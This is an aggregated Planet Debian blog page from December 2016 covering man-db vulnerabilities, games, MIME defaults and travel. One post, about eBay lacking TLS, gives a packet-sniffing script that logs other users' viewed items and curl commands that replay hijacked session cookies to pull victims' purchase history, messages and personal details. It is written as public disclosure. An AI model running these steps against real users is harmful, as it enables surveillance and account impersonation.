The most subtle and risky set of problems came from the fact that the man and mandb programs were installed set-user-id to the man user. Part of this was so that man could maintain preformatted “cat pages”, and part of it was so that users could run mandb if the system databases were out of date (this is now much less useful since most package managers, including dpkg, support some kind of trigger mechanism that can run mandb whenever new system-level manual pages are installed). One of the first things I did was to make this optional, and this has been a disabled-by-default debconf option in Debian for a long time now. But it’s still a supported option and is enabled by default upstream, and when running setuid man and mandb need to take care to drop privileges when dealing with user-controlled data and to write files with the appropriate ownership and permissions.

My predecessor had problems related to this such as Debian #26002, and one of the ways they dealt with them was to make /var/cache/man/ set-group-id root, in order that files written to that directory would have consistent group ownership. This always struck me as rather strange and I meant to do something about it at some point, but until the first vulnerability report above I regarded it as mainly a curiosity, since nothing in there was group-writeable anyway. As a result, with the more immediate aim of making the system behave consistently and dealing with bug reports, various bits of code had accreted that assumed that /var/cache/man/ would be man:root 2755, and not all of it was immediately obvious.

This interacted with the second vulnerability report in two ways. Firstly, at some level it caused it because I was dealing with the day-to-day problems rather than thinking at a higher level: a series of bugs led me down the path of whacking problems over the head with a recursive chown of /var/cache/man/ from cron, rather than working out why things got that way in the first place. Secondly, once I’d done that, I couldn’t remove the chown without a much more extensive excursion into all the code that dealt with cache files, for fear of reintroducing those bugs. So although the fix for the second vulnerability is very simple in itself, I couldn’t get there without dealing with the first vulnerability.

In some ways, of course, cat pages are a bit of an anachronism. Most modern systems can format pages quickly enough that it’s not much of an issue. However, I’m loath to drop the feature entirely: I’m generally wary of assuming that just because I have a fast system that everyone does. So, instead, I did what I should have done years ago: make man and mandb set-group-id man as well as set-user-id man, at which point we can simply make all the cache files and directories be owned by man:man and drop the setgid bit on cache directories. This should be simpler and less prone to difficult-to-understand problems.

I expect that my next substantial upstream release will switch to --disable-setuid by default to reduce exposure, though, and distributions can start thinking about whether they want to follow that (Fedora already does, for example). If this becomes widely disabled without complaints then that would be good evidence that it’s reasonable to drop the feature entirely. I’m not in a rush, but if you do need cat pages then now is a good time to write to me and tell me why.

This is the fiddliest set of vulnerabilities I’ve dealt with in man-db for quite some time, so I hope that if there are more then I can get back to my previous quick response time.

11 December, 2016 11:42PM by Colin Watson

Sandro Tosi

What's that code: Elementary S04E09

They hacked a car, and around 7:27 in the episode they are analyzing the car computer's source code. "That's some sweet compression," they say, but it turns out to be the Perl interpreter's source code, with Perl replaced by Auto (after all, it's the auto code, right?).

https://perl5.git.perl.org/perl.git/blob/HEAD:/perl.c#l431 and following lines

Another interesting code copy was in The Americans (can't remember the season or episode): when they were trying to acquire the ECHO program's source code, what's on the screen is actually MATLAB source code.

11 December, 2016 05:25PM by Sandro Tosi ([email protected])

Petter Reinholdtsen

Oolite, a life in space as vagabond and mercenary - nice free software

In my early years, I played the epic game Elite on my PC. I spent many months trading and fighting in space, and reached the 'elite' fighting status before I moved on. The original Elite game was available on Commodore 64 and the IBM PC edition I played had a 64 KB executable. I am still impressed today that the authors managed to squeeze both a 3D engine and details about more than 2000 planet systems across 7 galaxies into a binary so small.

I have known about the free software game Oolite, inspired by Elite, for a while, but did not really have time to test it properly until a few days ago. It was great to discover that my old knowledge about trading routes was still valid. But my fighting and flying abilities were gone, so I had to retrain to be able to dock at a space station. And I am still not able to offer much resistance when I am attacked by pirates, so I bought and mounted the most powerful laser in the rear to be able to put up at least some resistance while fleeing for my life. :)

When playing Elite in the late eighties, I had to discover everything on my own, and I had long lists of prices seen on different planets to be able to decide where to trade what. This time I had the advantage of the Elite wiki, where information about each planet is easily available, with common price ranges and suggested trading routes. This improved my ability to earn money, and I have been able to earn enough to buy a lot of useful equipment in a few days. I believe I originally played for months before I could get a docking computer, while now I could get one after less than a week.

If you like science fiction and dreamed of a life as a vagabond in space, you should try out Oolite. It is available for Linux, MacOSX and Windows, and is included in Debian and derivatives since 2011.

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

11 December, 2016 10:40AM

hackergotchi for Charles Plessy

Charles Plessy

apt purge ifupdown

...oh wow, it still works... I never had realised that network-manager did not need ifupdown.

11 December, 2016 07:30AM

December 10, 2016

hackergotchi for Iain R. Learmonth

Iain R. Learmonth

The Internet of Dangerous Auction Sites

It might be that the internet era of fun and games is over, because the internet is now dangerous. – Bruce Schneier

Ok, I know this is kind of old news now, but Bruce Schneier gave testimony to the House of Representatives’ Energy & Commerce Committee about computer security after the Dyn attack. I’m including this quote because I feel it sets the scene nicely for what follows here.

Last week, I was browsing the popular online auction site eBay and I noticed that there was no TLS. For a moment, I considered that maybe my traffic was being intercepted; surely there's no way that eBay, as a global company, would be deliberately risking its users in this way. I was wrong. There is not, and has never been, TLS for large swathes of the eBay site. In fact, the only points at which I’ve found TLS are in their help pages and when it comes to entering card details (although it’ll give you back the last 4 digits of your card over a plaintext channel).

sudo apt install wireshark
# You'll want to allow non-root users to perform capture
sudo adduser `whoami` wireshark
# Log out and in again to assume the privileges you've granted yourself

What can you see?

The first thing I’d like to call eBay on is a statement in their webpage about Cookies, Web Beacons, and Similar Technologies:

We don’t store any of your personal information on any of our cookies or other similar technologies.

Well, eBay, I don’t know about you, but for me my name is personal information. Ana, who investigated this with me, also confirmed that her name was present in her cookie when using her account. But to answer the question: you can see pretty much everything.

Using the Observer module of PATHspider, which is essentially a programmable flow meter, let’s take a look at what items users of the network are browsing:

sudo apt install pathspider

The following is a Python 3 script that you’ll need to run as root (for packet capturing) and will need to kill with ^C when you’re done because I didn’t give it an exit condition:

import logging
import queue
import threading
import email
import re
from io import StringIO

import plt

from pathspider.observer import Observer

from pathspider.observer import basic_flow
from pathspider.observer.tcp import tcp_setup
from pathspider.observer.tcp import tcp_handshake
from pathspider.observer.tcp import tcp_complete

def tcp_reasm_setup(rec, ip):
        rec['payload'] = b''
        return True

def tcp_reasm(rec, tcp, rev):
        if not rev and tcp.payload is not None:
                rec['payload'] += tcp.payload.data
        return True

lturi = "int:wlp3s0" # CHANGE THIS TO YOUR NETWORK INTERFACE
logging.getLogger().setLevel(logging.INFO)
logger = logging.getLogger(__name__)
ebay_itm = re.compile("(?:item=|itm(?:\/[^0-9][^\/]+)?\/)([0-9]+)")

o = Observer(lturi,
             new_flow_chain=[basic_flow, tcp_setup, tcp_reasm_setup],
             tcp_chain=[tcp_handshake, tcp_complete, tcp_reasm])
q = queue.Queue()
t = threading.Thread(target=o.run_flow_enqueuer,
                     args=(q,),
                     daemon=True)
t.start()

while True:
    f = q.get()
    # www.ebay.co.uk uses keep alive for connections, multiple requests
    # may be in a single flow
    requests = [x + b'\r\n' for x in f['payload'].split(b'\r\n\r\n')]
    for request in requests:
        if request.startswith(b'GET '):
            request_text = request.decode('ascii')
            request_line, headers_alone = request_text.split('\r\n', 1)
            headers = email.message_from_file(StringIO(headers_alone))
            if headers['Host'] != "www.ebay.co.uk":
                break
            itm = ebay_itm.search(request_line)
            if itm is not None and len(itm.groups()) > 0 and itm.group(1) is not None:
                logging.info("%s viewed item %s", f['sip'],
                             "http://www.ebay.co.uk/itm/" + itm.group(1))

Note: PATHspider’s Observer won’t emit a flow until it is completed, so you may have to close your browser in order for the TCP connection to be closed as eBay does use Connection: keep-alive.

If all is working correctly (if it was really working correctly, it wouldn’t be working because the connections would be encrypted, but you get what I mean…), you’ll see something like:

INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/192045666116
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/161990905666
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/311756208540
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/131911806454
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/192045666116

It is left as an exercise to the reader to map the IP addresses to users. You do however have the hint that the first name of the user is in the cookie.

This was a very simple example; you can also passively sniff the content of messages sent and received on eBay (though I’ll admit email has the same flaw in a large number of cases), and you can also see the purchase history and cart contents when those screens are viewed. Ana also pointed out that when you browse for items at home, eBay may recommend you similar items, and then those recommendations would also be available to anyone viewing the traffic at your workplace.

Perhaps you want to see the purchase history but you’re too impatient to wait for the user to view the purchase history screen. Don’t worry, this is also possible.

Three researchers from the Department of Computer Science at Columbia University, New York published a paper earlier this year titled The Cracked Cookie Jar: HTTP Cookie Hijacking and the Exposure of Private Information. In this paper, they talk about hijacking cookies using packet capture tools and then using the cookies to impersonate users when making requests to websites. They also detail in this paper a number of concerning websites that are vulnerable, including eBay.

Yes, it’s 2016, nearly 2017, and cookie hijacking is still a thing.

You may remember Firesheep, a Firefox plugin, that could be used to hijack Facebook, Twitter, Flickr and other websites. It was released in October 2010 as a demonstration of the security risk of session hijacking vulnerabilities to users of web sites that only encrypt the login process and not the cookie(s) created during the login process. Six years later and eBay has not yet listened.

So what is cookie hijacking all about? Let’s get hands on. This time, instead of looking at the request line, look at the Cookie header. Just dump that out. Something like:

print(headers['Cookie'])
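If you want the extraction to be a bit more robust than a one-line dump, header parsing over raw captured bytes is only a few lines of standard-library Python. This is just a sketch (not part of PATHspider's API), assuming you already have the raw HTTP request bytes from your capture tool:

```python
# Sketch: pull the Cookie header out of a raw captured HTTP request.
# Assumes the raw request bytes are already in hand; HTTP header names
# are case-insensitive, so compare lowercased.
def extract_cookie(raw_request):
    head, _, _ = raw_request.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n")[1:]:  # skip the request line itself
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"cookie":
            return value.strip().decode("latin-1")
    return None

raw = (b"GET /itm/192045666116 HTTP/1.1\r\n"
       b"Host: www.ebay.co.uk\r\n"
       b"Cookie: nonsession=anon; dp1=example\r\n"
       b"Connection: keep-alive\r\n\r\n")
print(extract_cookie(raw))  # nonsession=anon; dp1=example
```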

Now you have the user’s cookie and you can impersonate that user. Store the cookie in an environment variable named COOKIE and…

sudo apt install curl
# Get the purchase history
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/PurchaseHistory > history.html
# Get the current cart contents
curl --cookie "$COOKIE" http://cart.payments.ebay.co.uk/sc/view > cart.html
# Get the current bids/offers
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/BidsOffers > bids.html
# Get the messages list
curl --cookie "$COOKIE" http://mesg.ebay.co.uk/mesgweb/ViewMessages/0 > messages.html
# Get the watch list
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/WatchList > watch.html

I’m sure you can use your imagination for more. One of my favourites is…

# Get the personal information
curl --cookie "$COOKIE" "http://my.ebay.co.uk/ws/eBayISAPI.dll?MyeBay&CurrentPage=MyeBayPersonalInfo&gbh=1&ssPageName=STRK:ME:LNLK" > personal.html

This one will give you the secret questions (but not the answers) and the last 4 digits of the registered card for a seller account. In the case of Mat Honan in 2012, the last 4 digits of his card number led to the loss of his Twitter account.

The techniques I’ve shown here do not seem to care where the request comes from. We tested using my cookie from Ana’s laptop and also tried from a server hosted in the US (our routing origin is in Germany, so this should perhaps have been a red flag). I could not find any interface through which I could query my login history; I’m not sure what it would have shown.

I’m not a security researcher, though I do work as an Internet Engineering researcher. I’m publishing this because these vulnerabilities have already been disclosed in the paper I linked above and I believe this is something that needs attention. Every time over the last week that I pointed out to someone that eBay does not use TLS, they were surprised, and often horrified.

You might think that better validation of the source of the cookie might help, for instance, rejecting requests that suddenly come from other countries. As long as the attacker is on the path they have the ability to create flows that impersonate the host at the network layer. The only option here is to encrypt the flow and to ensure a means of authenticating the server, which is exactly what TLS provides.

You might think that such attacks may never occur, but active probes in response to passive measurements have been observed. I would think that having all these cookies floating around the Internet is really just an invitation for those cookies to be abused by some intelligence service (or criminal organisation). I would be very surprised if such ideas had not already been explored, if not implemented, on a large scale.

Please Internet, TLS already.

10 December, 2016 09:25PM

hackergotchi for Junichi Uekawa

Junichi Uekawa

Hello December.

Hello December. I was sick most of the time.

10 December, 2016 02:47AM by Junichi Uekawa

December 09, 2016

hackergotchi for Simon Richter

Simon Richter

Busy

I'm fairly busy at the moment, so I don't really have time to work on free software, and when I do I really want to do something else than sit in front of a computer.

I have declared email bankruptcy at 45,000 unread mails. I still have them, and plan to deal with them in small batches of a few hundred at a time, but in case you sent me something important, it is probably stuck in there. I now practice Inbox Zero, so resending it is a good way to reach me.

For my Debian packages, not much changes. Any package with more than ten users is team maintained anyway. Sponsoring for the packages where I agreed to do so goes on.

For KiCad, I won't get around to much of what I'd planned this year. Fortunately, at this point no one expects me to do anything soon. I still look into the CI system and unclog anything that doesn't clear on its own within a week.

Plans for December:

  • actually having my own place. While I like the room I'm staying at, it is still fairly expensive because it's paid by the day, and living out of a suitcase without access to my library is kind of annoying after some time.
  • finishing the paperwork for 2016. Except for some small bits, most of it is in place.
  • 33C3. This time, instead of the "two monitors, three computers" setup, my plan is to have a single laptop only, and have it closed most of the time so the battery lasts the whole day.
  • See how far I'll get with the controller board for the CNC mill in the Munich Maker Lab. Absolutely no pressure there, it's only the most complex and expensive PCB I ever made.

Plans for January:

  • Getting settled in.
  • Back to the Carbon Monoxide detector board that we started in early November. The board is simple enough.
  • Visiting a demoparty in Finland

Plans for February:

  • FOSDEM. I plan to hang out in the EDA devroom most of the time, and go to dinner with friends.
  • Party. Specifically, a housewarming party for whatever flat I'll have then.

Other than that, reading lots of books and meeting other people.

09 December, 2016 10:08PM

hackergotchi for Guido Günther

Guido Günther

Debian Fun in November 2016

Debian LTS

November marked the nineteenth month I contributed to Debian LTS under the Freexian umbrella. I had 7 hours allocated which I used completely by:

  • Being at LTS frontdesk twice (at the beginning and end of November), triaging about 30 CVEs.
  • Preparing and releasing DLA-698-1 for QEMU, fixing 9 CVEs
  • Putting out DLA-699-1 for xen; the actual xen update was prepared by Bastian Blank

Other Debian stuff

  • Usual bunch of libvirt and related uploads (osinfo-db-tools, libvirt-python, libosinfo)
  • Sponsored svn2git upload
  • Uploaded git-buildpackage 0.8.7 to unstable (list of changes)

Some other Free Software activities

09 December, 2016 02:18PM

John Goerzen

Giant Concrete Arrows, Old Maps, and Fascinated Kids

Let me set a scene for you. Two children, ages 7 and 10, are jostling for position. There’s a little pushing and shoving to get the best view.

This is pretty typical for siblings this age. But what, you may wonder, are they trying to see? A TV? Video game?

No. Jacob and Oliver were in a library, trying to see a 98-year-old map of the property owners in Township 23, range 1 East, Harvey County, Kansas. And they were super excited about it, somewhat to the astonishment of the research librarian, who I am sure is more used to children jostling for position over the DVDs in the youth section than poring over maps in the non-circulating historical archives!

All this started with giant concrete arrows in the middle of nowhere.

Nearly a century ago, the US government installed a series of arrows on the ground in Kansas. These were part of a primitive air navigation system that led to the first transcontinental airmail service.

Every so often, people stumble upon these abandoned arrows and there is a big discussion online. Even Snopes has had to verify their authenticity (verdict: true). Entire websites are devoted to tracking and locating the remnants of these arrows. And as one of the early air mail routes went through Kansas, every so often people find these arrows around here.

I got the idea that it would be fun to replicate a journey along the old routes. Maybe I’d spot a few old arrows and such. So I started collecting old maps: a Contract Airmail Route #34 (CAM 34) map from 1927, aviation sectionals from 1933 and 1946, etc.

I noticed an odd thing on these maps: the Newton, KS airport was on the other side of the city from its present location, sometimes even several miles outside the city. What was going on?

1927 Airway Map
(1927 Airway Map)

1946 Wichita Sectional
(1946 Wichita sectional)

So one foggy morning, I explained my puzzlement to the boys. I highlighted all the mysteries: were these maps correct? Were there really two Newton airports at one time? How many airports were there, and where were they? Why did they move? What was the story behind them?

And I offered them the chance to be history detectives with me. And oh my goodness, were they ever excited! We had some information from a very helpful person at the Harvey County Historical Museum (thanks Kris!). So we suspected that at least one airport was established in 1927. We also had a description of its location, though given in terms of township maps.

So the boys and I made the short drive over to the museum. We reviewed their property maps, though they were all a little older than the time period we needed. We looked through books and at pictures. Oliver pored over a railroad map of Newton from a century ago, fascinated. Jacob was excited to discover on one map that there used to be a train track down the middle of Main Street! I was interested that the present Newton Airport was once known as Wirt Field, rather to my surprise. I somehow suspect most 2nd and 4th graders spend a lot less excited time on their research floor!

Then on to the Newton Public Library to see if they’d have anything more — and that’s when the map that produced all the excitement came out.

It, by itself, didn’t answer the question, but by piecing together a number of sources — newspaper stories, information from the museum, and the maps — we were able to come up with a pretty good explanation, much to their excitement.

Apparently, a man named Tangeman owned a golf course (the “golf links” according to the paper), and around 1927 the city of Newton purchased it, because of all the planes that were landing there. They turned it into a real airport. Later, they bought land east of the city and moved the airport there. However, during World War II, the Navy took over that location, so they built a third airport a few miles west of the city — but moved back to the current east location after the Navy returned that field to them.

Of course, a project like this just opens up all sorts of extra questions: why isn’t it called Wirt Field anymore? What’s the story of Frank Wirt? What led the Navy to take over Newton’s airport? Why did planes start landing on the golf course? Where precisely was the west airport located? How long was it there? (I found an aerial photo from 1956 that looks like it may have a plane in that general area, but it seems later than I’d have expected)

So now I have the boys interested in going to the courthouse with me to research the property records out there. Jacob is continually astounded that we are discovering things that aren’t in Wikipedia, and also excited that he could be the one to add them. To be continued, apparently!

09 December, 2016 03:04AM by John Goerzen

December 08, 2016

Stig Sandbeck Mathisen

MIME types and applications

On a Linux system with ‘desktop-file-utils’ installed, the default application for opening a file with a file manager, from a web browser, or using “xdg-open” on the command line is not static. The last installed or upgraded application becomes the default.

For example: after installing gimp, that application will be used to open any of the many types of files it supports. This lasts until another application which can open those MIME types is installed or upgraded.

If I later install or upgrade “mupdf”, that application will be used for PDF, until, etcetera.

There are several bug reports filed for this confusing behaviour:

Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=525077

Ubuntu: https://bugs.launchpad.net/ubuntu/+source/gimp/+bug/574342

Firefox: https://bugzilla.mozilla.org/show_bug.cgi?id=727422

Components

/usr/bin/update-desktop-database

…is a command in the package ‘desktop-file-utils’

This command is run in the package postinst script, and triggers on writes to /usr/share/applications where .desktop files are written.

/usr/share/applications

This directory contains a list of applications (files ending with .desktop). These desktop files list the MIME types they are able to work with.

The ‘mupdf.desktop’ example shows it is able to work with (among others) application/pdf

[Desktop Entry]
Encoding=UTF-8
Name=MuPDF
GenericName=PDF file viewer
Comment=PDF file viewer
Exec=mupdf %f
TryExec=mupdf
Icon=mupdf
Terminal=false
Type=Application
MimeType=application/pdf;application/x-pdf;
Categories=Viewer;Graphics;
NoDisplay=true

[Desktop Action View]
Exec=mupdf %f

The gimp.desktop application entry shows it is more capable:

[Desktop Entry]
Version=1.0
Type=Application
Name=GNU Image Manipulation Program
# [...]
MimeType=image/bmp;image/g3fax;image/gif;image/x-fits;image/x-pcx;image/x-portable-anymap;image/x-portable-bitmap;image/x-portable-graymap;image/x-portable-pixmap;image/x-psd;image/x-sgi;image/x-tga;image/x-xbitmap;image/x-xwindowdump;image/x-xcf;image/x-compressed-xcf;image/x-gimp-gbr;image/x-gimp-pat;image/x-gimp-gih;image/tiff;image/jpeg;image/x-psp;application/postscript;image/png;image/x-icon;image/x-xpixmap;image/svg+xml;application/pdf;image/x-wmf;image/x-xcursor;

However, I’m quite sure I do not want ‘gimp’ to be the default viewer for all those file types.

/usr/share/applications/mimeinfo.cache

This is a list of MIME types, with a list of applications able to open them. The first entry in the list is the default application.

You may also have one of these in ~/.local/share/applications for applications installed in the user’s home directory.

Examples:

With ‘gimp.desktop’ first, “xdg-open test.pdf” will use gimp

[MIME Cache]
# [...]
application/pdf=gimp.desktop;mupdf.desktop;evince.desktop;libreoffice-draw.desktop;

After uninstalling and reinstalling mupdf, “mupdf.desktop” is first in the list, and “xdg-open test.pdf” will use mupdf

[MIME Cache]
# [...]
application/pdf=mupdf.desktop;gimp.desktop;evince.desktop;libreoffice-draw.desktop;

The order of .desktop files in mimeinfo.cache is the reverse of the order they are added to that directory.

The last installed utility is first in that list.
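Since mimeinfo.cache is INI-style, the "first entry wins" lookup is easy to reproduce; here is a sketch in standard-library Python (the helper name `default_app` is mine, and note that the real resolution also consults the user's mimeapps.list):

```python
# Sketch: resolve the default application for a MIME type from an
# INI-style mimeinfo.cache. Entries are semicolon-separated .desktop
# files; the first one is the default.
import configparser
import io

def default_app(cache_text, mime_type):
    cp = configparser.ConfigParser()
    cp.read_file(io.StringIO(cache_text))
    entry = cp.get("MIME Cache", mime_type, fallback=None)
    return entry.split(";")[0] if entry else None

cache = """[MIME Cache]
application/pdf=mupdf.desktop;gimp.desktop;evince.desktop;
"""
print(default_app(cache, "application/pdf"))  # mupdf.desktop
```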

Application Trace

This was fun to dig into. I’ve just gotten some training which included a better look at auditd. Auditd is a nice hammer, and this problem was a good nail.

I ran the command under “autrace”, and then looked for the order of reads from each run.

When “mupdf” is installed last, mupdf.desktop is read last, and placed first in the list of applications:

root@laptop:~# autrace /usr/bin/update-desktop-database
Waiting to execute: /usr/bin/update-desktop-database
Cleaning up...
Trace complete. You can locate the records with 'ausearch -i -p 13507'

root@laptop:~# ausearch -p 13507 | aureport --file | egrep 'gimp|mupdf'
389. 12/09/2016 17:35:37 /usr/share/applications/gimp.desktop 4 yes /usr/bin/update-desktop-database 1000 8002
390. 12/09/2016 17:35:37 /usr/share/applications/gimp.desktop 2 yes /usr/bin/update-desktop-database 1000 8003
391. 12/09/2016 17:35:37 /usr/share/applications/mupdf.desktop 4 yes /usr/bin/update-desktop-database 1000 8010
392. 12/09/2016 17:35:37 /usr/share/applications/mupdf.desktop 2 yes /usr/bin/update-desktop-database 1000 8011

root@laptop:~# grep application/pdf /usr/share/applications/mimeinfo.cache
application/pdf=mupdf.desktop;gimp.desktop;evince.desktop;libreoffice-draw.desktop;

Reinstalling “gimp” puts that first in the entry for application/pdf

root@laptop:~# apt install --reinstall gimp
[...]
Preparing to unpack .../gimp_2.8.18-1_amd64.deb ...
Unpacking gimp (2.8.18-1) over (2.8.18-1) ...
Processing triggers for mime-support (3.60) ...
Processing triggers for desktop-file-utils (0.23-1) ...
Setting up gimp (2.8.18-1) ...
Processing triggers for gnome-menus (3.13.3-8) ...
[...]

root@laptop:~# autrace /usr/bin/update-desktop-database
Waiting to execute: /usr/bin/update-desktop-database
Cleaning up...
Trace complete. You can locate the records with 'ausearch -i -p 15043'

root@laptop:~# ausearch -p 15043 | aureport --file | egrep 'gimp|mupdf'
389. 12/09/2016 17:39:53 /usr/share/applications/mupdf.desktop 4 yes /usr/bin/update-desktop-database 1000 9550
390. 12/09/2016 17:39:53 /usr/share/applications/mupdf.desktop 2 yes /usr/bin/update-desktop-database 1000 9551
391. 12/09/2016 17:39:53 /usr/share/applications/gimp.desktop 4 yes /usr/bin/update-desktop-database 1000 9556
392. 12/09/2016 17:39:53 /usr/share/applications/gimp.desktop 2 yes /usr/bin/update-desktop-database 1000 9557

root@laptop:~# grep application/pdf /usr/share/applications/mimeinfo.cache
application/pdf=gimp.desktop;mupdf.desktop;evince.desktop;libreoffice-draw.desktop;

Configuration

The solution is to add configuration so that something other than the default is used. The “xdg-mime” command is your tool.

The various desktop environments often do this for you. However, if you have a lightweight work environment, you may need to do this yourself for the MIME types you care about.

ssm@laptop ~ :) % xdg-mime query default application/pdf
gimp.desktop

ssm@laptop ~ :) % xdg-mime default mupdf.desktop application/pdf

ssm@laptop ~ :) % xdg-mime query default application/pdf
mupdf.desktop

This updates “~/.local/share/applications/mimeapps.list”, and you should now have set your preferred PDF reader.
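For reference, the written file is again INI-style; assuming the mupdf association set above, the relevant part of “~/.local/share/applications/mimeapps.list” would look something like:

```ini
[Default Applications]
application/pdf=mupdf.desktop
```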

08 December, 2016 11:00PM

hackergotchi for Alessio Treglia

Alessio Treglia

The new professionals of the interconnected world

There is an empty chair at the conference table of business professionals, an unassigned place that increasingly demands the presence of a new type of integration manager. The demands for ever-increasing specialization, imposed by the modern world, are bringing out with great emphasis the need for an interdisciplinary professional who understands the demands of specialists and who is able to coordinate and to link actions and decisions. This need, often still ignored, is a direct result of the growing complexity of the modern world and the fast communications inside the network.

“Complexity” is undoubtedly the most suitable paradigm to characterize the historical and social model of today’s world, in which the interactions and connections between the various areas now form an inextricable network of relations. Since the ’60s and ’70s a large group of scholars – including the chemist Ilya Prigogine and the physicist Murray Gell-Mann – began to study what would become a true Science of Complexity.

Yet this is not an entirely new concept: the term means “composed of several parts connected to each other and dependent on each other“, exactly as reality, nature, society, and the environment around us. A “complex” mode of thought integrates and considers all contexts, interconnections, interrelationships between the different realities as part of the vision.

What is professionalism? And who are professionals? What can define a professional? <…>

<Read More…[by Fabio Marzocca]>

08 December, 2016 02:02PM by Fabio Marzocca

Vincent Fourmond

Finding zeros of data using QSoas

QSoas does not provide commands to detect the zeros of data by default, because it is simple to convert this problem into a peak-finding problem using the integrate command, which can then be solved using the find-peaks command. Here is that strategy applied to determining the zeros of the 0-th order Bessel function:

QSoas> generate-buffer -10 10 bessel_j0(x) /samples=100001
QSoas> integrate
Current buffer now is: 'generated_int.dat'
QSoas> find-peaks
Found 6 peaks
buffer what x y index width left_width right_width
generated_int.dat min -8.6538 -0.201157042341714 6731 1.7798 0.905999999999999 0.873800000000001
generated_int.dat max -5.52 0.398165469321319 22400 2.2854 1.1862 1.0992
generated_int.dat min -2.4048 -0.403288737672291 37976 1.8232 0.973 0.850199999999999
generated_int.dat max 2.4048 2.53731134529594 62024 nan 2.2026 nan
generated_int.dat min 5.52 1.73585713830231 77600 nan 5.7198 nan
generated_int.dat max 8.6538 2.33517964996535 93269 nan 8.5532 nan

Compare that with the values given on Mathematica's website. This strategy is reasonably resistant to noise, since integration decreases high-frequency noise, but you may have to play with the /window option to find-peaks to avoid detecting the same zero (peak) several times.
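The same trick carries over to any environment that can integrate sampled data. A quick standard-library Python sketch (my own illustration, not QSoas code), using sin(x) so the expected zeros at multiples of π are easy to check:

```python
# Sketch of the integrate-then-find-peaks trick on plain sampled data:
# integrate the samples, then report the local extrema of the integral,
# which sit at the zeros of the original function.
import math

xs = [i * 0.001 for i in range(1, 10000)]   # (0, 10), excluding x = 0
ys = [math.sin(x) for x in xs]

# cumulative trapezoidal integral of ys
integral = [0.0]
for i in range(1, len(xs)):
    integral.append(integral[-1] + 0.5 * (ys[i] + ys[i - 1]) * (xs[i] - xs[i - 1]))

# local extrema of the integral = zeros of the original data
zeros = [xs[i] for i in range(1, len(integral) - 1)
         if (integral[i] - integral[i - 1]) * (integral[i + 1] - integral[i]) < 0]
print(zeros)  # zeros near pi, 2*pi and 3*pi
```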

Hopefully, I'll come back with more regular postings of tips and tricks!

08 December, 2016 08:57AM by Vincent Fourmond ([email protected])

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

RcppAPT 0.0.3

A new version of RcppAPT -- our interface from R to the C++ library behind the awesome apt, apt-get, apt-cache, ... commands and their cache powering Debian, Ubuntu and the like -- is now on CRAN.

We changed the package to require C++11 compilation as newer Debian systems with g++-6 and the current libapt-pkg-dev library cannot build under the C++98 standard which CRAN imposes (and let's not get into why ...). Once set to C++11 we have no issues. We also added more examples to the manual pages, and turned on code coverage.

A bit more information about the package is available here as well as at the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

08 December, 2016 01:19AM

December 07, 2016

hackergotchi for Shirish Agarwal

Shirish Agarwal

Day trip in Cape Town, part 2

Debconf16 logo

The post continues from the last post shared.

Let me get some interesting titbits not related to the day trip out of the way first –

I don’t know whether we had full access to see all parts of Fuller Hall or not. For a couple of days I was wandering around Fuller Hall, specifically next to where clothes were pressed. I came to know of the laundry service pretty late but it was still useful. Umm… next to where the ladies/gentlemen pressed our clothes, there is a stairway which goes down. In fact even on the opposite side there is a stairway which goes down. I dunno if other people explored them or not.

The jail inside and under UCT

I was surprised and shocked to see bars in each room as well as connecting walkways etc. I felt a bit sad, confused and curious and went on to find more places like that. After a while I came up to the ground level and enquired with some of the ladies therein. I was shocked to learn that UCT some years ago (they were not specific) was a jail for people. I couldn’t imagine that a place which has so much warmth (in people, not climate) could be ‘evil’ in a sense. I was not able to get much information out of them about the nature of the jail; maybe it is a dark past that nobody wants to open up about, dunno. There were also two *important* aspects of UCT which Bernelle either forgot or didn’t share, and which I only came to know via the Wikipedia page.

1. MeerKAT – Apparently quite a bit of the technology was built in UCT itself. This would have been interesting for geeks and wanna-be geeks like me🙂

2. The OpenContent Initiative by UCT – This would have been also something worth exploring.

One more interesting thing which I saw was the French Consulate in Cape Town from outside

The French Consulate in Cape Town from outside

I would urge you to look at the picture in the gallery as the picture I shared doesn’t really show all the details. For e.g. the typical large French windows which are the hall-mark of French architecture don’t show their glory, but if you look at the 1306×2322 original picture instead of the 202×360 reproduction you will see it.

You will also see the insignia of the French Imperial Eagle, whose history I came to know only after I looked it up on its Wikipedia page that day.

It seemed fascinating and probably would have the same pride as the State Emblem of India has for Indians with the four Asiatic Lions standing in a circle protecting each other.

I also like the palm tree and the way the French Consulate seemed little and yet had character among all the big buildings.

What was also interesting was that there wasn’t any scare/fear build-up and we could take photos from outside, unlike what I had seen and experienced in Doha, Qatar as far as photography near Western Embassies/Consulates was concerned.

One of the very eye-opening moments for me also came while I was researching flights from India to South Africa. While perhaps unconsciously I might have known that the Middle East is close to India, it was only during the search that I became aware most places in the Middle East are only an hour or two away by flight.

This was shocking, as there is virtually no mention of one of our neighbours even though they are a source of large-scale remittances every year. I mean this should have been in our history and geography books but most do not dwell on the subject. It was only during and after the trip that I could understand Mr. Modi’s interactions and trade policies with the Middle East.

Another interesting bit was seeing a bar in a Springbok bus –

Springbok Atlas bar in bus

While admittedly it is not the best picture of the bar, I was surprised to find a bar at the back of a bus. By bar I mean a machine which can serve anything from juices to alcoholic drinks depending upon what is stocked. What was also interesting in the same bus is that the bus also had a middle entrance-and-exit.

The middle door in springbok atlas

This is something I hadn’t seen in most Indian buses. Some of the Volvo buses have one but it is rarely used (only in emergencies). An exhaustive showcase of local buses can be seen here. I find the hand-drawn/CAD depictions of all the buses by Amit Pense accurate to a T.

Axe which can be used to break windows

Emergency exit window

